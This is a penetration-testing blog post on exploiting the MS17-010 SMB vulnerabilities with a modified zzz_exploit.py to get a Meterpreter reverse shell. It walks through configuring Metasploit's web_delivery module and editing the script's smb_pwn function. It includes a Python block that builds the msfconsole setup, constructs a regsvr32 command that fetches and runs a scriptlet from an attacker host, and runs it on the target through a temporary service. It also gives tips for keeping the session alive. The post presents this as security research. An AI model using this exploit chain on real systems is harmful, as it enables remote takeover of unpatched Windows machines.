MS17-010: Python



Background

MS17-010 is the Microsoft security bulletin (March 2017) that patched a set of SMBv1 vulnerabilities. The exploits for them (EternalBlue, EternalRomance, EternalSynergy and EternalChampion) were reportedly developed by the NSA and were leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found in the Check Point Research analysis listed in the references.

This vulnerability is commonly found on internal penetration tests and, when exploited, typically gives SYSTEM-level access through remote code execution. Metasploit ships several modules for it:

msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Even with this abundance of modules, there still isn't one that consistently works against x86 targets or less common version builds; the usual complaint from Metasploit is that the target does not match the required architecture or build. This can be addressed with a customised version of Worawit's Python script.

For the purpose of testing, this set-up was run against an x64 Windows Server Datacenter build that I know is vulnerable to MS17-010; further work will go into confirming that it also works on x86. That said, zzz_exploit.py states that it has been tested on all of the following versions:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

Worawit published a GitHub repository full of proof-of-concept code and useful scripts. The noteworthy ones are checker.py (which reports whether a host is patched and which named pipes it accepts) and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to allow more manual exploitation of MS17-010 and should allow for the exploitation of the Windows variants listed above.

All credit goes to Korey McKinley and his article (Manually Exploiting MS17-010, listed in the references); small adjustments were made to suit my current set-up.

Metasploit

Korey introduced me to a technique that was new to me: using regsvr32 to call back to the attacker machine, download a scriptlet and create a reverse shell. The Metasploit module for this is web_delivery.

This is easy enough to configure. In Metasploit, use the exploit/multi/script/web_delivery module and set the options accordingly.

This module has several methods (targets) for calling back to the attacker machine; this post sticks to regsvr32.

My Metasploit configuration looked like this:

Ensure that set target 3 (Regsvr32) is used. What this module does is serve a scriptlet that the target method (regsvr32) fetches from the attacker machine; the scriptlet then stages the payload specified, in this case windows/x64/meterpreter/reverse_tcp.

Once this module is run, it generates a command that can be run on a target machine to create the callback. For testing, it is worth manually copying and pasting this command into your test VM and watching Metasploit to confirm that the regsvr32 command works. Once you're happy that it does, this command needs to be added to zzz_exploit.py.

The command created:


zzz_exploit.py

Clone Worawit's GitHub repository, make any permission changes required and open zzz_exploit.py. Line 972 is where the smb_pwn function is defined.

The first few lines of this function create a pwned.txt on C:\ as a proof of execution. This isn't required, so comment out the following:

print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)

Underneath that there is a commented-out example call to the service_exec function. Uncomment it and swap its argument for the command generated by web_delivery. The function should now look similar to this:

The function has now been updated to contain the regsvr32 command. Execute the script against the target host with python zzz_exploit.py 192.168.0.35. Note that zzz_exploit.py authenticates with the USERNAME and PASSWORD values set near the top of the script (empty by default, i.e. a null session) and needs a named pipe it can open; if the null session is rejected by the target, set valid credentials there.
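As an added example (not code from the original post, Korey McKinley's article or Worawit's repository), the following Python brings together the web_delivery settings from the Metasploit section and the smb_pwn change described above. ATTACKER_HOST, LPORT, SRVPORT and URI_PATH are placeholder values, and the executor is injected so the hook can be exercised without a target; when pasted into zzz_exploit.py the script's own service_exec and conn are used.

```python
"""Added example, not code from the original post, Korey McKinley's article or
Worawit's repository: the web_delivery settings from the Metasploit section and
a replacement smb_pwn() hook for zzz_exploit.py that launches the regsvr32
stager instead of creating c:\\pwned.txt.

Assumed (placeholder) values: ATTACKER_HOST, LPORT, SRVPORT and URI_PATH.
service_exec() and conn are provided by zzz_exploit.py when the hook is pasted
in; here the executor can be injected so the hook runs without a target.
"""
import re

# Constructed placeholders; replace with your own listener settings.
ATTACKER_HOST = "192.168.0.10"
LPORT = 4444
SRVPORT = 8080
URI_PATH = "xyz"
PAYLOAD = "windows/x64/meterpreter/reverse_tcp"

# Shape of the one-liner printed by web_delivery target 3 (Regsvr32):
#   regsvr32 /s /n /u /i:http://HOST:PORT/PATH.sct scrobj.dll
_REGSVR32_RE = re.compile(
    r"^regsvr32(?:\.exe)?\s+/s\s+/n\s+/u\s+"
    r"/i:(?P<url>https?://(?P<host>[^:/\s]+):(?P<port>\d+)(?P<path>/\S+))"
    r"\s+scrobj\.dll$",
    re.IGNORECASE,
)


def msfconsole_web_delivery(lhost, lport, srvport, uri_path, payload=PAYLOAD):
    """Return an msfconsole invocation that starts web_delivery with the
    Regsvr32 target (target 3) and the payload used in the post."""
    steps = [
        "use exploit/multi/script/web_delivery",
        "set target 3",                   # 3 = Regsvr32
        "set payload %s" % payload,
        "set LHOST %s" % lhost,           # callback address for the stage
        "set LPORT %d" % lport,
        "set SRVPORT %d" % srvport,       # port the .sct is served on
        "set URIPATH %s" % uri_path,
        "run -j",                         # background handler + web server
    ]
    return 'msfconsole -q -x "%s"' % "; ".join(steps)


def build_regsvr32_command(host, port, uri_path):
    """Build the regsvr32 stager in the form web_delivery prints.

    /s silent, /n skip DllRegisterServer, /u call DllUnregisterServer,
    /i:<url> call DllInstall with the URL. scrobj.dll's DllInstall treats the
    argument as a scriptlet location, so the .sct is fetched over HTTP and
    executed inside regsvr32.exe without writing a payload to disk.
    """
    url = "http://%s:%d/%s.sct" % (host, int(port), uri_path.strip("/"))
    return "regsvr32 /s /n /u /i:%s scrobj.dll" % url


def parse_regsvr32_command(cmd):
    """Check that a pasted web_delivery command really is the Regsvr32 form
    (and not the PSH or Python target) and return its host/port/path.
    Raises ValueError otherwise; run this before editing zzz_exploit.py."""
    m = _REGSVR32_RE.match(cmd.strip())
    if m is None:
        raise ValueError("not a regsvr32 web_delivery stager: %r" % cmd)
    return {"host": m.group("host"), "port": int(m.group("port")),
            "path": m.group("path")}


def smb_pwn(conn, arch, service_exec=None, command=None):
    """Replacement for smb_pwn() in zzz_exploit.py.

    The original creates c:\\pwned.txt over the C$ share; this version skips
    that and runs the regsvr32 stager through service_exec(), which creates a
    temporary service whose binary path is the command, starts it and removes
    it again. Returns the command that was launched.
    """
    if service_exec is None:
        # Resolved from zzz_exploit.py's globals once this function is pasted in.
        service_exec = globals()["service_exec"]
    if command is None:
        command = build_regsvr32_command(ATTACKER_HOST, SRVPORT, URI_PATH)
    parse_regsvr32_command(command)  # refuse anything that is not the regsvr32 form
    print("launching regsvr32 stager on %s target: %s" % (arch, command))
    service_exec(conn, command)
    return command
```

The string formatting is kept Python 2 and 3 compatible so the hook can be dropped straight into zzz_exploit.py. One caveat the post does not cover: because service_exec() launches the command as a service binary, the Service Control Manager may terminate the process once it fails to report as a service (30 seconds by default), so migrate the Meterpreter session promptly after it arrives rather than leaving it in regsvr32.exe.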

Once executed, you should see something similar to this:

The output shows regsvr32 calling back, fetching the payload, and the Meterpreter session being created.

And that's how to use regsvr32 to create a reverse shell from an MS17-010 Python script. The purpose is to allow further research into exploiting more obscure versions of Windows, which is exactly what I will be doing in the near future. I am fairly certain this will work on x86 machines, but I will write another post confirming or denying it.

My modified fork can be found here.

References

Worawit: Twitter

Worawit: GitHub

Korey McKinley: Manually Exploiting MS17-010

Microsoft Docs: Regsvr32

Check Point Research: MS17-010 Analysis